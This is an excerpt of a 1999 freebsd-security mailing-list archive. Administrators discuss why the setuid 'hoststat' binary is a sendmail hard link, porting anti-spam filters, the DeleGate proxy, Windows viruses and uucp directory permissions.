 19217 ktrace   CALL  break(0x6000)
 19217 ktrace   RET   break 0
 19217 ktrace   CALL  execve(0xefbfd3c8,0xefbfd888,0xefbfd890)
 19217 ktrace   NAMI  "/usr/local/bin/hoststat"
 19217 ktrace   RET   execve -1 errno 2 No such file or directory
 19217 ktrace   CALL  execve(0xefbfd3c8,0xefbfd888,0xefbfd890)
 19217 ktrace   NAMI  "/usr/local/sbin/hoststat"
 19217 ktrace   RET   execve -1 errno 2 No such file or directory
 19217 ktrace   CALL  execve(0xefbfd3c8,0xefbfd888,0xefbfd890)
 19217 ktrace   NAMI  "/usr/bin/hoststat"
---

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
| Matthew Fuller           http://www.over-yonder.net/     |
* fullermd@futuresouth.com       fullermd@over-yonder.net  *
| UNIX Systems Administrator      Specializing in FreeBSD  |
* FutureSouth Communications     ISPHelp ISP Consulting    *
| "The only reason I'm burning my candle at both ends,     |
* is because I haven't figured out how to light the        *
| middle yet"                                              |
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

From owner-freebsd-security Mon Mar 29 23:46: 1 1999
Received: from GndRsh.aac.dev.com (GndRsh.aac.dev.com [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 95D68153D6 for ; Mon, 29 Mar 1999 23:45:50 -0800 (PST) (envelope-from rgrimes@GndRsh.aac.dev.com)
Received: (from rgrimes@localhost) by GndRsh.aac.dev.com (8.8.8/8.8.8) id XAA11308; Mon, 29 Mar 1999 23:45:17 -0800 (PST) (envelope-from rgrimes)
From: "Rodney W. Grimes"
Message-Id: <199903300745.XAA11308@GndRsh.aac.dev.com>
Subject: Re: Curious about 'hoststat'
In-Reply-To: from "Harry M. Leitzell" at "Mar 30, 99 02:02:24 am"
To: Harry_M_Leitzell@cmu.edu (Harry M. Leitzell)
Date: Mon, 29 Mar 1999 23:45:17 -0800 (PST)
Cc: freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL32 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

> Well, I am going through a FreeBSD machine and removing the suid
> bits on programs that have no purpose having them for a simple user host
> machine. Going through /var/log/setuid.today and changing the permissions
> on the programs seems like a good idea until I got to 'hoststat'.
> 
> -r-sr-xr-x 5 root wheel 290016 Feb 15 05:45:23 1999 /usr/bin/hoststat
> 
> I usually go through the man pages for a program that has a suid
> bit by default to make sure no user actually could have a use for it.
> Only this doesn't have a man page. A keyword search turns up nothing.
> Running it does seemingly nothing. It intrigues me that a program could be
> suid 0 by default and not have any documentation on it. While the
> experienced person might just CVS the source, deduce the meaning of it
> from the code, some of us don't have the experience or time to do so. I
> was just thinking if there isn't sufficient documentation on the program,
> should it be installed suid 0 by default?

It should have a man page.. but it is documented in
/usr/share/doc/smm/08.sendmailop/. Which says this about it:

1.3.4.  /usr/bin/hoststat

     The hoststat command should just be a link to sendmail, in a
fashion similar to newaliases.  This command lists the status of the
last mail transaction with all remote hosts.  It functions only when
the HostStatusDirectory option is set.

It is a hardlink to /usr/sbin/sendmail, and that is why it has suid on it...

-- 
Rod Grimes - KD7CAX - (RWG25)                    rgrimes@gndrsh.aac.dev.com
Accurate Automation, Inc.   Reliable computers for FreeBSD   http://www.aai.dnsmgr.com

From owner-freebsd-security Tue Mar 30 0:23:16 1999
Received: from ns1.seidata.com (ns1.seidata.com [208.10.211.2]) by hub.freebsd.org (Postfix) with ESMTP id 0716314D1A for ; Tue, 30 Mar 1999 00:23:10 -0800 (PST) (envelope-from mike@seidata.com)
Received: from localhost (mike@localhost) by ns1.seidata.com (8.8.8/8.8.5) with ESMTP id DAA17756; Tue, 30 Mar 1999 03:22:49 -0500 (EST)
Date: Tue, 30 Mar 1999 03:22:49 -0500 (EST)
From:
To: "Matthew D. Fuller"
Cc: "Harry M. Leitzell" , freebsd-security@FreeBSD.ORG
Subject: Re: Curious about 'hoststat'
In-Reply-To: <19990330012422.Z17547@futuresouth.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Tue, 30 Mar 1999, Matthew D. Fuller wrote:

> > -r-sr-xr-x 5 root wheel 290016 Feb 15 05:45:23 1999 /usr/bin/hoststat
> 1) From strings-ing it, it looks like part of sendmail

FWIW, ls -l /usr/bin/hoststat shows that it is a link to sendmail under
my 3.0-REL boxes.
Later,
-Mike

From owner-freebsd-security Tue Mar 30 0:33:39 1999
Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 12EA314D93 for ; Tue, 30 Mar 1999 00:33:37 -0800 (PST) (envelope-from jkh@zippy.cdrom.com)
Received: from zippy.cdrom.com (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id AAA43894; Tue, 30 Mar 1999 00:32:53 -0800 (PST) (envelope-from jkh@zippy.cdrom.com)
To: "Harry M. Leitzell"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Curious about 'hoststat'
In-reply-to: Your message of "Tue, 30 Mar 1999 02:02:24 EST."
Date: Tue, 30 Mar 1999 00:32:53 -0800
Message-ID: <43892.922782773@zippy.cdrom.com>
From: "Jordan K. Hubbard"

> Well, I am going through a FreeBSD machine and removing the suid
> bits on programs that have no purpose having them for a simple user host
> machine. Going through /var/log/setuid.today and changing the permissions
> on the programs seems like a good idea until I got to 'hoststat'.

Look at the inode number - it's the same file as /usr/sbin/sendmail.
It's just there as a convenient hook.

- Jordan

From owner-freebsd-security Tue Mar 30 2:24:25 1999
Received: from k6n1.znh.org (unknown [207.109.235.52]) by hub.freebsd.org (Postfix) with ESMTP id EBA7815A8C for ; Tue, 30 Mar 1999 02:23:50 -0800 (PST) (envelope-from zach@uffdaonline.net)
Received: (from zach@localhost) by k6n1.znh.org (8.9.3/8.9.1) id KAA09168; Tue, 30 Mar 1999 10:20:05 GMT (envelope-from zach)
Message-ID: <19990330042005.A9075@znh.org>
Date: Tue, 30 Mar 1999 04:20:05 -0600
From: Zach Heilig
To: Brett Glass , Laurence Berland , security@freebsd.org
Subject: Re: Virus Announcements
References: <4.2.0.32.19990329155900.00a557c0@localhost> <4.2.0.32.19990329164244.04553770@localhost> <37001F1B.C2B92D74@confusion.net> <4.2.0.32.19990329175542.00c88430@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: <4.2.0.32.19990329175542.00c88430@localhost>; from Brett Glass on Mon, Mar 29, 1999 at 06:09:45PM -0700

On Mon, Mar 29, 1999 at 06:09:45PM -0700, Brett Glass wrote:
> In the meantime, who here knows the arcana of how to build a package?
> I've looked at the innards of a couple of tarballs but have no idea
> how to specify dependencies, pop up a message to tell the user what to
> do next, test for the right version of Perl (you need Perl5 and some
> FreeBSD users have Perl4), etc. There don't seem to be any docs.

You did look in the top part of /usr/ports/Mk/bsd.port.mk , right?  It
does a fair job of documenting what needs to be done for a port.

-- 
Zach Heilig

From owner-freebsd-security Tue Mar 30 2:26:30 1999
Received: from aniwa.sky (p18-max12.wlg.ihug.co.nz [216.100.145.18]) by hub.freebsd.org (Postfix) with ESMTP id B4D3615A24 for ; Tue, 30 Mar 1999 02:26:26 -0800 (PST) (envelope-from andrew@squiz.co.nz)
Received: from aniwa.sky (localhost [127.0.0.1]) by aniwa.sky (8.9.1a/8.9.1) with ESMTP id VAA01035; Tue, 30 Mar 1999 21:38:01 +1200 (NZST)
Message-Id: <199903300938.VAA01035@aniwa.sky>
X-Mailer: exmh version 2.0.2 2/24/98
To: Brett Glass
Cc: Laurence Berland , security@FreeBSD.ORG
Subject: Re: Virus Announcements
In-reply-to: Your message of "Mon, 29 Mar 1999 18:09:45 MST." <4.2.0.32.19990329175542.00c88430@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 30 Mar 1999 21:38:01 +1200
From: Andrew McNaughton

> 
> In the meantime, who here knows the arcana of how to build a package? I've looked
> at the innards of a couple of tarballs but have no idea how to specify dependencies,
> pop up a message to tell the user what to do next, test for the right version of
> Perl (you need Perl5 and some FreeBSD users have Perl4), etc. There don't seem
> to be any docs.

Well, I'm no expert, but I've built my first few ports recently.

The documentation is in the handbook. In my somewhat outdated copy of the
handbook it's at "17.2.5. Porting an existing piece of free software".

Making a package amounts to the same thing as making a port. You just do a
"make package" from the port's directory.

Dependencies are specified in the Makefile. I don't know how they are
specified in the package, but I don't think it's something one needs to
know in order to build a package.
Andrew

-- 
-----------
Andrew McNaughton
andrew@squiz.co.nz
http://www.newsroom.co.nz/

From owner-freebsd-security Tue Mar 30 4:48: 1 1999
Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id D98521547C for ; Tue, 30 Mar 1999 04:47:55 -0800 (PST) (envelope-from fpscha@ns1.sminter.com.ar)
Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id JAA14655 for freebsd-security@freebsd.org; Tue, 30 Mar 1999 09:47:06 -0300 (GMT)
From: Fernando Schapachnik
Message-Id: <199903301247.JAA14655@ns1.sminter.com.ar>
Subject: Anti-spamming filter files
To: freebsd-security@freebsd.org
Date: Tue, 30 Mar 1999 09:47:05 -0300 (GMT)
X-Mailer: ELM [version 2.4ME+ PL40 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

The anti-spamming filters that come with FreeBSD in /etc/mail require
certain files from ftp.gulf.net. The folks there have closed anonymous FTP
for some security issue they had. Does anyone know an alternative place to
download these files?

Thanks!

Fernando P. Schapachnik
Network Administration
VIA Net Works Argentina SA

From owner-freebsd-security Tue Mar 30 5:20:39 1999
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 4BD611536A for ; Tue, 30 Mar 1999 05:20:37 -0800 (PST) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id GAA08250; Tue, 30 Mar 1999 06:20:12 -0700 (MST)
Message-Id: <4.2.0.32.19990330061206.00c3e510@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta)
Date: Tue, 30 Mar 1999 06:20:05 -0700
To: Zach Heilig , Laurence Berland , security@freebsd.org
From: Brett Glass
Subject: Re: Virus Announcements
In-Reply-To: <19990330042005.A9075@znh.org>
References: <4.2.0.32.19990329175542.00c88430@localhost> <4.2.0.32.19990329155900.00a557c0@localhost> <4.2.0.32.19990329164244.04553770@localhost> <37001F1B.C2B92D74@confusion.net> <4.2.0.32.19990329175542.00c88430@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

I haven't installed that port. I've been told, however, that the pkg_create
documentation has some information. (Not everything I'd need, and I'm
worried about trashing any system on which I test a port, but enough to
get started.)

Again, there are subtle dependencies. You need to be able to rebuild your
sendmail.cf with the m4 macro processor -- something that's not trivial to
do. The user would have to do this to make procmail the local delivery
agent, and we probably cannot automate it. Also, Perl is apparently in
different places on different FreeBSD systems. Some have it in /usr/bin,
others in /usr/local/bin. And the version of procmail in the ports differs
with the version of FreeBSD you have. (The latest procmail was released
only this month.)

So, you can get the user started by installing all that's needed, but must
then tell him or her how to do the rest by hand so as not to disrupt mail.

Finally, it isn't clear whether one can automatically pull in the latest
filters right from the repository on John's FTP site as part of the port.
Probably possible, but not clear from the docs.

--Brett

At 04:20 AM 3/30/99 -0600, Zach Heilig wrote:
>On Mon, Mar 29, 1999 at 06:09:45PM -0700, Brett Glass wrote:
>> In the meantime, who here knows the arcana of how to build a package?
>> I've looked at the innards of a couple of tarballs but have no idea
>> how to specify dependencies, pop up a message to tell the user what to
>> do next, test for the right version of Perl (you need Perl5 and some
>> FreeBSD users have Perl4), etc. There don't seem to be any docs.
>
>You did look in the top part of /usr/ports/Mk/bsd.port.mk , right?  It
>does a fair job of documenting what needs to be done for a port.
>
>-- 
>Zach Heilig

From owner-freebsd-security Tue Mar 30 7:23:45 1999
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 251ED159DE for ; Tue, 30 Mar 1999 07:23:38 -0800 (PST) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id KAA17222; Tue, 30 Mar 1999 10:23:14 -0500 (EST) (envelope-from wollman)
Date: Tue, 30 Mar 1999 10:23:14 -0500 (EST)
From: Garrett Wollman
Message-Id: <199903301523.KAA17222@khavrinen.lcs.mit.edu>
To: "Matthew D. Fuller"
Cc: "Harry M. Leitzell" , freebsd-security@FreeBSD.ORG
Subject: Re: Curious about 'hoststat'
In-Reply-To: <19990330012422.Z17547@futuresouth.com>
References: <19990330012422.Z17547@futuresouth.com>

< said:

> 1) From strings-ing it, it looks like part of sendmail

As others have pointed out, it is a hard link to sendmail.  It doesn't
do anything unless you are using the `persistent host status' feature,
in which case it tells you what the status is/was:

-------------- Hostname --------------- How long ago ---------Results---------
uu2.pn.com                               3+13:58:30 250 TAA26192 Message acce
smtp1.pn.com                           296+10:13:00 250 BAA11595 Message acce
world.std.com                            3+19:47:51 Deferred: Operation timed
world-f.std.com                            01:21:42 250 Ok
pimaia3w.prodigy.com                   405+21:25:26 Deferred: Connection refu
[1652 additional lines deleted]

-GAWollman

--
Garrett A. Wollman    | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu   | O Siem / The fires of freedom
Opinions not those of | Dance in the burning flame
MIT, LCS, CRS, or NSA | - Susan Aglukark and Chad Irschick

From owner-freebsd-security Tue Mar 30 8: 0:52 1999
Received: from aniwa.sky (p32-max12.wlg.ihug.co.nz [216.100.145.32]) by hub.freebsd.org (Postfix) with ESMTP id 78BA714CC6 for ; Tue, 30 Mar 1999 08:00:47 -0800 (PST) (envelope-from andrew@squiz.co.nz)
Received: from aniwa.sky (localhost [127.0.0.1]) by aniwa.sky (8.9.1a/8.9.1) with ESMTP id EAA04595; Wed, 31 Mar 1999 04:00:00 +1200 (NZST)
Message-Id: <199903301600.EAA04595@aniwa.sky>
X-Mailer: exmh version 2.0.2 2/24/98
To: Garrett Wollman
Cc: "Matthew D. Fuller" , "Harry M. Leitzell" , freebsd-security@FreeBSD.ORG
Subject: Re: Curious about 'hoststat'
In-reply-to: Your message of "Tue, 30 Mar 1999 10:23:14 EST." <199903301523.KAA17222@khavrinen.lcs.mit.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 31 Mar 1999 04:00:00 +1200
From: Andrew McNaughton

> < said:
> 
> > 1) From strings-ing it, it looks like part of sendmail
> 
> As others have pointed out, it is a hard link to sendmail.  It doesn't

It's a symlink on my system. At least one other post indicated the same.
I presume this is dependent on the vintage of your sendmail setup. I've
upgraded my system from an original install of 8.8.7 to sendmail 8.9.1.
Is the symlink a more recent arrangement than the hard link, or is this
something to do with the upgrade not changing it? (perhaps writing through
the symlink)

Andrew

-- 
-----------
Andrew McNaughton
andrew@squiz.co.nz
http://www.newsroom.co.nz/

From owner-freebsd-security Wed Mar 31 8:17:54 1999
Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 634F715520 for ; Wed, 31 Mar 1999 08:17:51 -0800 (PST) (envelope-from jkb@shell6.ba.best.com)
Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id IAA14098; Wed, 31 Mar 1999 08:17:09 -0800 (PST)
Message-ID: <19990331081709.B11641@best.com>
Date: Wed, 31 Mar 1999 08:17:09 -0800
From: "Jan B. Koum "
To: "Jordan K. Hubbard" , "Harry M. Leitzell"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Curious about 'hoststat'
References: <43892.922782773@zippy.cdrom.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: <43892.922782773@zippy.cdrom.com>; from Jordan K. Hubbard on Tue, Mar 30, 1999 at 12:32:53AM -0800

On Tue, Mar 30, 1999 at 12:32:53AM -0800, "Jordan K. Hubbard" wrote:
> > Well, I am going through a FreeBSD machine and removing the suid
> > bits on programs that have no purpose having them for a simple user host
> > machine. Going through /var/log/setuid.today and changing the permissions
> > on the programs seems like a good idea until I got to 'hoststat'.
> 
> Look at the inode number - it's the same file as /usr/sbin/sendmail.
> It's just there as a convenient hook.
> 
> - Jordan
> 
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

What Jordan said, but now with pictures.

nautilus# set I=`ls -li /usr/bin/hoststat|cut -f1 -d" "`
nautilus# find / -inum $I -ls
445461 592 -r-sr-xr-x 5 root wheel 290016 Feb 3 21:07 /usr/bin/newaliases
445461 592 -r-sr-xr-x 5 root wheel 290016 Feb 3 21:07 /usr/bin/mailq
445461 592 -r-sr-xr-x 5 root wheel 290016 Feb 3 21:07 /usr/bin/hoststat
445461 592 -r-sr-xr-x 5 root wheel 290016 Feb 3 21:07 /usr/sbin/sendmail
445461 592 -r-sr-xr-x 5 root wheel 290016 Feb 3 21:07 /usr/sbin/purgestat

-- Yan

From owner-freebsd-security Wed Mar 31 11:16:46 1999
Received: from mel.alcatel.fr (mel.alcatel.fr [212.208.74.132]) by hub.freebsd.org (Postfix) with ESMTP id C42BC14D45 for ; Wed, 31 Mar 1999 11:16:37 -0800 (PST) (envelope-from Stephane.Lentz@ansf.alcatel.fr)
Received: from aifhs2.alcatel.fr (mailhub.alcatel.fr [155.132.180.80]) by mel.alcatel.fr (ALCANET/SMTP) with ESMTP id UAA23802 for ; Wed, 31 Mar 1999 20:14:28 +0200
Received: from sl95.ansf.alcatel.fr (nsfws7.ansf.alcatel.fr [159.217.81.12]) by aifhs2.alcatel.fr (ALCANET/SMTP2) with ESMTP id VAA23134 for ; Wed, 31 Mar 1999 21:12:09 +0200 (MET DST)
Received: by sl95.ansf.alcatel.fr (Postfix, from userid 1003) id 9399274; Wed, 31 Mar 1999 21:15:54 +0100 (CET)
Date: Wed, 31 Mar 1999 21:15:54 +0100
From: Stephane Lentz
To: security@FreeBSD.ORG
Subject: Opinions on DeleGate proxy (TIS FWTK's competitor ?)
Message-ID: <19990331211554.A23722@ansf.alcatel.fr>
Reply-To: Stephane.Lentz@ansf.alcatel.fr
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Mailer: Mutt 0.95.3i
X-Unit: AI
Organization: Alcanet International

Hi,

I would like to know your opinion on a proxy that has not been discussed
for quite a long time on this list and is seldom mentioned elsewhere : DeleGate

Here is a résumé :
- main URL http://www.delegate.org/delegate/
- general purpose TCP/IP proxy system (protocols supported are FTP, Gopher,
  HTTP, NNTP, POP, SMTP, Telnet, Wais, X, LDAP, LPR, CU-SeeMe, Socks, ICP, SSL)
- current version : 5.9.1 (released on 1999-03-15)
- runs on Unix (including of course FreeBSD) + M$ platforms
- mailing-list available at http://www.delegate.org/delegate/ml/delegate-en.html
- FreeBSD port available (but only for version 5.7.2)
  http://www.freebsd.org/cgi/url.cgi?ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/ports/net/delegate/pkg/DESCR
- licence less restrictive than FWTK's one
- updated regularly by the author

What do you think about it ?
Do you find it reliable and use it ?

The only shortcomings I find for now are :
- incomplete and unclear documentation bundled (few samples, not enough details, ...)
- warnings during compilation on some platforms
- some function calls in the code (I wonder if the code is "secure enough" and
  robust enough : buffer-overflows, memory-management, ...). Code reviews
  by security gurus ?
- not widely used (mainly used in Japan)

I did some tiny tests (only with HTTP, NNTP) and it worked. I didn't try it
with SSLeay but plan to use it.

I would like to know if it can cope with many users/ high traffic and if
you know pros/cons.

Regards,

Stéphane.

-- 
Stephane Lentz - = Stephane.Lentz@ansf.alcatel.fr ==========

From owner-freebsd-security Wed Mar 31 11:22:51 1999
Received: from mel.alcatel.fr (mel.alcatel.fr [212.208.74.132]) by hub.freebsd.org (Postfix) with ESMTP id 470A3153F4 for ; Wed, 31 Mar 1999 11:22:38 -0800 (PST) (envelope-from Stephane.Lentz@ansf.alcatel.fr)
Received: from aifhs2.alcatel.fr (mailhub.alcatel.fr [155.132.180.80]) by mel.alcatel.fr (ALCANET/SMTP) with ESMTP id UAA24410 for ; Wed, 31 Mar 1999 20:20:27 +0200
Received: from sl95.ansf.alcatel.fr (nsfws7.ansf.alcatel.fr [159.217.81.12]) by aifhs2.alcatel.fr (ALCANET/SMTP2) with ESMTP id VAA24258 for ; Wed, 31 Mar 1999 21:18:08 +0200 (MET DST)
Received: by sl95.ansf.alcatel.fr (Postfix, from userid 1003) id 5D19374; Wed, 31 Mar 1999 21:21:53 +0100 (CET)
Date: Wed, 31 Mar 1999 21:21:53 +0100
From: Stephane Lentz
To: freebsd-security@FreeBSD.ORG
Subject: Opinions on DeleGate proxy (TIS FWTK's competitor ?)
Message-ID: <19990331212153.A23731@ansf.alcatel.fr>
Reply-To: Stephane.Lentz@ansf.alcatel.fr
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Mailer: Mutt 0.95.3i
X-Unit: AI (Internet Services)
Organization: Alcanet International

Hi,

I would like to know your opinion on a proxy that has not been discussed
for quite a long time on this list and is seldom mentioned elsewhere : DeleGate

Here is a résumé :
- main URL http://www.delegate.org/delegate/
- general purpose TCP/IP proxy system (protocols supported are FTP, Gopher,
  HTTP, NNTP, POP, SMTP, Telnet, Wais, X, LDAP, LPR, CU-SeeMe, Socks, ICP, SSL)
- current version : 5.9.1 (released on 1999-03-15)
- runs on Unix (including of course FreeBSD) + M$ platforms
- mailing-list available at http://www.delegate.org/delegate/ml/delegate-en.html
- FreeBSD port available (but only for version 5.7.2)
  http://www.freebsd.org/cgi/url.cgi?ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/ports/net/delegate/pkg/DESCR
- licence less restrictive than FWTK's one
- updated regularly by the author

What do you think about it ?
Do you find it reliable and use it (any experience is welcome) ?

The only shortcomings I find for now are :
- incomplete and unclear documentation bundled (few samples, not enough details, ...)
- warnings during compilation on some platforms
- some function calls in the code (I wonder if the code is "secure enough" and
  robust enough : buffer-overflows, memory-management, ...). Code reviews
  by security gurus ?
- not widely used (mainly used in Japan)

I did some tiny tests (only with HTTP, NNTP) and it worked. I didn't try it
with SSLeay but plan to use it.

I would like to know if it can cope with many users/ high traffic and if
you know pros/cons.

Regards,

Stéphane.
-- Stephane Lentz - Alcanet International / Internet Services ======== Stephane.Lentz@ansf.alcatel.fr ========== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 31 12:31:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from hosting.doublesquare.com (hosting.doublesquare.com [195.5.128.151]) by hub.freebsd.org (Postfix) with ESMTP id B1C3915C8B for ; Wed, 31 Mar 1999 12:31:04 -0800 (PST) (envelope-from ark@eltex.ru) Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46] (may be forged)) by hosting.doublesquare.com (8.8.8/8.8.8) with ESMTP id AAA09566 for ; Thu, 1 Apr 1999 00:04:16 +0400 (MSD) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id AAA02521; Thu, 1 Apr 1999 00:02:57 +0400 (MSD) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Thu, 1 Apr 1999 00:02:54 +0400 Received: from undisclosed-intranet-sender id xma000665; Thu, 1 Apr 99 00:02:52 +0400 From: -=ArkanoiD=- Message-Id: <199903312002.AAA01152@paranoid.eltex.spb.ru> Subject: Re: Opinions on DeleGate proxy (TIS FWTK's competitor ?) In-Reply-To: <19990331212153.A23731@ansf.alcatel.fr> from Stephane Lentz at "Mar 31, 1999 09:21:53 pm" To: Stephane.Lentz@ansf.alcatel.fr Date: Thu, 1 Apr 1999 00:02:49 +0400 (MSD) Cc: freebsd-security@FreeBSD.ORG Reply-To: ark@eltex.ru X-Mailer: ELM [version 2.4ME+ PL53 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org nuqneH, Somebody (maybe you, Stephane Lentz) WROTE: [Charset iso-8859-1 unsupported, filtering to ASCII...] > What do you think about it ? > Do you find it reliable and use it (any experience is welcome) ? > > The only shortcomings I find for now are : > - incomplete and unclear documentation bundled (few samples, not enough details, ...) 
> - warnings during compilation on some platforms > - some function calls in the code (I wonder if the code is "secure enough" and > robust enough : buffer-overflows, memory-management, ...). Code reviews > by security gurus ? > - not widely used (mainly used in Japan) - monolythic, less flexible, harder to update and does not provide generic, easy to understand API to write addons. Security audit is not easy for similar reasons. I did not like it. -- _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 31 13: 2:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (Postfix) with ESMTP id 6FAE015D61 for ; Wed, 31 Mar 1999 13:02:33 -0800 (PST) (envelope-from benedict@echonyc.com) Received: from localhost (benedict@localhost) by echonyc.com (8.9.3/8.9.3) with ESMTP id QAA27123; Wed, 31 Mar 1999 16:02:05 -0500 (EST) Date: Wed, 31 Mar 1999 16:02:05 -0500 (EST) From: Snob Art Genre Reply-To: ben@rosengart.com To: Brett Glass Cc: "'freebsd-security@FreeBSD.ORG'" Subject: Re: Virus Announcements In-Reply-To: <4.2.0.32.19990329225803.00a86c70@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 29 Mar 1999, Brett Glass wrote: > In the real world, none of us can avoid having to deal with Windows. > In many cases, it's the reason why our UNIX skills are so valuable. Speak for yourself. I don't deal with Windows, and I think all this Windows virus talk, while not intrinsically valueless, is out of place on FreeBSD lists. Ben "You have your mind on computers, it seems." 
From: Andrew McNaughton
Date: Thu, 01 Apr 1999 09:31:32 +1200
To: Stephane.Lentz@ansf.alcatel.fr
Cc: security@FreeBSD.ORG
Subject: Re: Opinions on DeleGate proxy (TIS FWTK's competitor ?)

> Hi,
>
> I would like to know your opinion on a proxy that has not been discussed
> for quite a long time on this list and is seldom mentioned elsewhere : DeleGate

I didn't really get to know much of it, but it has some features which I find useful, not for heavy weight use, but on my laptop.

What I liked was the way it lays out its http and ftp cache according to the url. It's probably not as efficient as squid, but it does make it nice and easy to set up a local search facility to find pages in its cache and translate the url's so everything gets fetched using the original URL and links up nicely.

Also, I find its logging better than squid's for looking at exactly what's going through in the headers while browsing the web, which has been useful for debugging on occasion.
(Can someone recommend a more general tool for analyzing tcp sessions and presenting them in legible form?)

I can't vouch one way or the other for how it performs doing more serious work.

Andrew McNaughton

--
-----------
Andrew McNaughton
andrew@squiz.co.nz
http://www.newsroom.co.nz/

From: Wes Peters
Organization: Softweyr llc
Date: Wed, 31 Mar 1999 23:26:09 -0700
To: ben@rosengart.com
Cc: Brett Glass, freebsd-security@FreeBSD.ORG
Subject: Re: Virus Announcements

Snob Art Genre wrote:
>
> On Mon, 29 Mar 1999, Brett Glass wrote:
>
> > In the real world, none of us can avoid having to deal with Windows.
> > In many cases, it's the reason why our UNIX skills are so valuable.
>
> Speak for yourself. I don't deal with Windows, and I think all this
> Windows virus talk, while not intrinsically valueless, is out of place
> on FreeBSD lists.

Except as an amusing anecdote on why we don't use Wankers 95. Monday morning I woke up to a report by one of the talking heads on "The Today Show" about how this email virus was affecting "all computer users."
I told my wife before learning anything more about it that it didn't affect "all computer users," nor would it affect her. I was certain it would turn out to be yet another MS-Bug being tickled, and was I right or what?

The best way to secure PCs is to remove all traces of Microsoft slopware from them, even the boot sector.

--
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                         Softweyr LLC
http://www.softweyr.com/~softweyr              wes@softweyr.com

From: 0x1c
Date: Fri, 2 Apr 1999 18:12:49 +0000 (GMT)
To: freebsd-security@freebsd.org
Subject: uucp home dir mode 777?

On my 2.2.8-REL box and my 3.1-REL box the modes for user uucp's home dir are both 777. Is there any particular reasoning behind this?

Nick

--
Therefore those skilled at the unorthodox are as infinite as heaven and earth, inexhaustible as the great rivers.
-- Sun Tzu, The Art of War

From: Mike Holling
Date: Thu, 1 Apr 1999 23:39:09 -0800 (PST)
To: 0x1c
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: uucp home dir mode 777?

> On my 2.2.8-REL box and my 3.1-REL box the modes for user uucp's home dir
> are both 777. Is there any particular reasoning behind this?

UUCP requires the "public" directory to be mode 777. If you don't use UUCP, you can get rid of it altogether.

- Mike

From: Andrew McNaughton
To: Mike Holling
Cc: 0x1c, freebsd-security@FreeBSD.ORG
Subject: Re: uucp home dir mode 777?
Date: Sat, 03 Apr 1999 02:03:39 +1200

